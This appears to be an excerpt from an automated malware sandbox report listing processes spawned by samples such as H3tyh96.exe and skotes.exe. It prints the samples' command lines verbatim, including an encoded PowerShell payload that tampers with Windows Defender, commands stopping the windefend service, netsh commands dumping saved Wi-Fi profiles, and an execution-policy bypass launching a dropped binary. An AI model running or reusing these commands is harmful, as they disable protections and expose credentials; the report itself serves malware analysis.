Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ClientAny.exe "C:\Users\user\AppData\Local\Temp\ClientAny.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma	Jump to behavior

Source: ae44c30d83.exe, 00000033.00000002.3197309870.0000000000D92000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3085649699.0000000000B26000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: Program Manager
Source: 75f24a4b40.exe, 00000008.00000002.3253907204.0000000000AD4000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: LProgram Manager
Source: H3tyh96.exe, H3tyh96.exe, 00000007.00000002.3299916766.000000000054F000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ~Program Manager
Source: skotes.exe, skotes.exe, 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: !)Program Manager

Language, Device and Operating System Detection

Yara detected Discord Recon

Source: Yara match

File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0029DD91 cpuid

6_2_0029DD91

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe VolumeInformation	Jump to behavior
